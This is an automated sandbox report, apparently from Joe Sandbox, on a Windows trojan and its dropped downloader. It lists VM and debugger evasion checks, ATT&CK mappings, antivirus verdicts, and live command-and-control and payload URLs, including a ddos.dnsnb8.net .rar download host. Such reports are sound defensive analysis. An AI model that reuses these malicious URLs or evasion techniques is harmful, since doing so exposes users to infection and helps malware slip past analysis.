      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
      Source: Amcache.hve.2.drBinary or memory string: VMware
      Source: Amcache.hve.2.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.2.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.2.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.2.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.2.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.2.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.2.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.2.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.2.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.2.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342368005.0000000001EE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: Amcache.hve.2.drBinary or memory string: vmci.sys
      Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.2.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.2.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.2.drBinary or memory string: VMware20,1
      Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.2.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.2.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
      Source: Amcache.hve.2.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.2.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.2.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.2.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.2.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.2.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.2.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
      Source: Amcache.hve.2.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeAPI call chain: ExitProcess graph end nodegraph_2-911
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSystem information queried: ModuleInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeOpen window title or class name: regmonclass
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeOpen window title or class name: filemonclass
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeProcess queried: DebugPortJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: strainriskpropos.stor
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: telephoneverdictyow.site
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: punchtelephoneverdi.stor
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: smallrabbitcrossing.site
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: snuggleapplicationswo.fun
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: theoryapparatusjuko.fun
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: healthproline.pro
      Source: SciTE.exe.2.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,2_2_00DF1718
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,2_2_00DF139F
      Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.2.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.2.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.2.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: Process Memory Space: oHOvZLBf.exe PID: 7520, type: MEMORYSTR
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: Process Memory Space: oHOvZLBf.exe PID: 7520, type: MEMORYSTR
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      1
      Masquerading
      11
      Input Capture
      11
      System Time Discovery
      1
      Taint Shared Content
      11
      Input Capture
      1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell
      Boot or Logon Initialization Scripts2
      Process Injection
      33
      Virtualization/Sandbox Evasion
      LSASS Memory631
      Security Software Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      11
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager33
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive2
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Process Injection
      NTDS1
      Process Discovery
      Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA Secrets3
      File and Directory Discovery
      SSHKeylogging112
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information
      Cached Domain Credentials4
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
      Software Packing
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Lisect_AVT_24003_G1A_70.exe86%VirustotalBrowse
      Lisect_AVT_24003_G1A_70.exe100%AviraW32/Jadtre.B
      Lisect_AVT_24003_G1A_70.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
      C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
      C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe100%AviraTR/Dldr.Small.Z.haljq
      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
      C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe92%ReversingLabsWin32.Trojan.Madeba
      No Antivirus matches
      SourceDetectionScannerLabelLink
      ddos.dnsnb8.net13%VirustotalBrowse
      strainriskpropos.store21%VirustotalBrowse
      snuggleapplicationswo.fun21%VirustotalBrowse
      telephoneverdictyow.site21%VirustotalBrowse
      punchtelephoneverdi.store20%VirustotalBrowse
      smallrabbitcrossing.site21%VirustotalBrowse
      healthproline.pro11%VirustotalBrowse
      theoryapparatusjuko.fun20%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://www.scintilla.org/scite.rng0%URL Reputationsafe
      http://www.rftp.comJosiah0%URL Reputationsafe
      http://www.activestate.com0%URL Reputationsafe
      http://www.activestate.comHolger0%URL Reputationsafe
      http://ddos.dnsnb8.net:799/cj//k3.rar100%URL Reputationmalware
      http://upx.sf.net0%URL Reputationsafe
      http://www.rftp.com0%URL Reputationsafe
      http://ddos.dnsnb8.net:799/cj//k2.rar100%URL Reputationmalware
      punchtelephoneverdi.stor0%Avira URL Cloudsafe
      https://snuggleapplicationswo.fun/y100%Avira URL Cloudmalware
      healthproline.pro100%Avira URL Cloudmalware
      https://strainriskpropos.store/api100%Avira URL Cloudmalware
      https://telephoneverdictyow.site/100%Avira URL Cloudmalware
      http://www.baanboard.comBrendon0%URL Reputationsafe
      https://www.smartsharesystems.com/0%URL Reputationsafe
      http://www.scintilla.org0%URL Reputationsafe
      http://www.spaceblue.comMathias0%URL Reputationsafe
      https://www.smartsharesystems.com/Morten0%URL Reputationsafe
      healthproline.pro11%VirustotalBrowse
      http://www.develop.com0%URL Reputationsafe
      http://www.lua.org0%URL Reputationsafe
      http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
      telephoneverdictyow.site100%Avira URL Cloudmalware
      http://www.spaceblue.com0%URL Reputationsafe
      https://strainriskpropos.store:443/api7100%Avira URL Cloudmalware
      http://www.baanboard.com0%URL Reputationsafe
      https://strainriskpropos.store/api18%VirustotalBrowse
      http://www.develop.comDeepak0%URL Reputationsafe
      https://strainriskpropos.store/apii9100%Avira URL Cloudmalware
      https://telephoneverdictyow.site/7100%Avira URL Cloudmalware
      https://telephoneverdictyow.site/8100%Avira URL Cloudmalware
      https://strainriskpropos.store:443/api78%VirustotalBrowse
      https://theoryapparatusjuko.fun/100%Avira URL Cloudmalware
      https://telephoneverdictyow.site/19%VirustotalBrowse
      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
      smallrabbitcrossing.site100%Avira URL Cloudmalware
      https://telephoneverdictyow.site/74%VirustotalBrowse
      smallrabbitcrossing.site21%VirustotalBrowse
      telephoneverdictyow.site21%VirustotalBrowse
      http://ddos.dnsnb8.net:799/cj//k1.rarTq100%Avira URL Cloudmalware
      https://theoryapparatusjuko.fun/20%VirustotalBrowse
      https://theoryapparatusjuko.fun/api18%VirustotalBrowse
      https://theoryapparatusjuko.fun/api100%Avira URL Cloudmalware
      strainriskpropos.stor0%Avira URL Cloudsafe
      http://ddos.dnsnb8.net:799/cj//k1.rarO100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k1.rarDC:100%Avira URL Cloudmalware
      https://telephoneverdictyow.site/84%VirustotalBrowse
      http://ddos.dnsnb8.net:799/cj//k2.rarl100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k1.rarDC:9%VirustotalBrowse
      https://punchtelephoneverdi.store/100%Avira URL Cloudmalware
      https://strainriskpropos.store/100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k3.raroC:100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k2.rarl11%VirustotalBrowse
      https://strainriskpropos.store/apiG100%Avira URL Cloudmalware
      theoryapparatusjuko.fun100%Avira URL Cloudmalware
      https://strainriskpropos.store/apiG17%VirustotalBrowse
      https://smallrabbitcrossing.site/100%Avira URL Cloudmalware
      snuggleapplicationswo.fun100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k1.rarO13%VirustotalBrowse
      theoryapparatusjuko.fun20%VirustotalBrowse
      http://ddos.dnsnb8.net:799/cj//k3.rar4100%Avira URL Cloudphishing
      https://smallrabbitcrossing.site/22%VirustotalBrowse
      http://ddos.dnsnb8.net:799/cj//k1.rarc100%Avira URL Cloudphishing
      https://strainriskpropos.store/21%VirustotalBrowse
      https://smallrabbitcrossing.site/M100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k3.raroC:14%VirustotalBrowse
      http://ddos.dnsnb8.net:799/cj//k3.rar414%VirustotalBrowse
      https://punchtelephoneverdi.store/20%VirustotalBrowse
      snuggleapplicationswo.fun21%VirustotalBrowse
      http://ddos.dnsnb8.net:799/cj//k1.rarc12%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      ddos.dnsnb8.net
      44.221.84.105
      truefalseunknown
      healthproline.pro
      unknown
      unknowntrueunknown
      smallrabbitcrossing.site
      unknown
      unknowntrueunknown
      strainriskpropos.store
      unknown
      unknowntrueunknown
      snuggleapplicationswo.fun
      unknown
      unknowntrueunknown
      punchtelephoneverdi.store
      unknown
      unknowntrueunknown
      telephoneverdictyow.site
      unknown
      unknowntrueunknown
      theoryapparatusjuko.fun
      unknown
      unknowntrueunknown
      NameMaliciousAntivirus DetectionReputation
      punchtelephoneverdi.stortrue
      • Avira URL Cloud: safe
      unknown
      healthproline.protrue
      • 11%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      telephoneverdictyow.sitetrue
      • 21%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k3.rartrue
      • URL Reputation: malware
      unknown
      smallrabbitcrossing.sitetrue
      • 21%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      strainriskpropos.stortrue
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rartrue
      • URL Reputation: malware
      unknown
      theoryapparatusjuko.funtrue
      • 20%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rartrue
      • URL Reputation: malware
      unknown
      snuggleapplicationswo.funtrue
      • 21%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://telephoneverdictyow.site/Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmptrue
      • 19%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      https://snuggleapplicationswo.fun/yLisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://strainriskpropos.store/apiLisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EF9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001EF9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EFD000.00000004.00000020.00020000.00000000.sdmptrue
      • 18%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://www.rftp.comJosiahSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      https://strainriskpropos.store:443/api7Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EEB000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342368005.0000000001EF1000.00000004.00000020.00020000.00000000.sdmptrue
      • 8%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://www.activestate.comSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://www.activestate.comHolgerSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      https://strainriskpropos.store/apii9Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EFD000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://telephoneverdictyow.site/7Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmptrue
      • 4%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      https://telephoneverdictyow.site/8Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmptrue
      • 4%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      https://theoryapparatusjuko.fun/Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpfalse
      • 20%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEoHOvZLBf.exe, 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmp, oHOvZLBf.exe, 00000002.00000003.1289900252.00000000007F0000.00000004.00001000.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rarTqoHOvZLBf.exe, 00000002.00000002.1538999460.0000000000BCE000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://theoryapparatusjuko.fun/apiLisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpfalse
      • 18%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rarOoHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C52000.00000004.00000020.00020000.00000000.sdmptrue
      • 13%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://upx.sf.netAmcache.hve.2.drfalse
      • URL Reputation: safe
      unknown
      http://www.rftp.comSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://www.baanboard.comBrendonSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rarDC:oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C6C000.00000004.00000020.00020000.00000000.sdmptrue
      • 9%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      https://www.smartsharesystems.com/SciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarloHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmptrue
      • 11%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://www.scintilla.orgSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      https://punchtelephoneverdi.store/Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpfalse
      • 20%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      https://strainriskpropos.store/Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342368005.0000000001EE3000.00000004.00000020.00020000.00000000.sdmpfalse
      • 21%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k3.raroC:oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C6C000.00000004.00000020.00020000.00000000.sdmptrue
      • 14%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://www.develop.comSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://www.lua.orgSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      https://strainriskpropos.store/apiGLisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmptrue
      • 17%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      https://smallrabbitcrossing.site/Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpfalse
      • 22%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://www.spaceblue.comSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://www.baanboard.comSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://www.develop.comDeepakSciTE.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k3.rar4oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmptrue
      • 14%, Virustotal, Browse
      • Avira URL Cloud: phishing
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rarcoHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmptrue
      • 12%, Virustotal, Browse
      • Avira URL Cloud: phishing
      unknown
      https://smallrabbitcrossing.site/MLisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      44.221.84.105
      ddos.dnsnb8.netUnited States
      14618AMAZON-AESUSfalse
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1481154
      Start date and time:2024-07-25 04:57:40 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 27s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:14
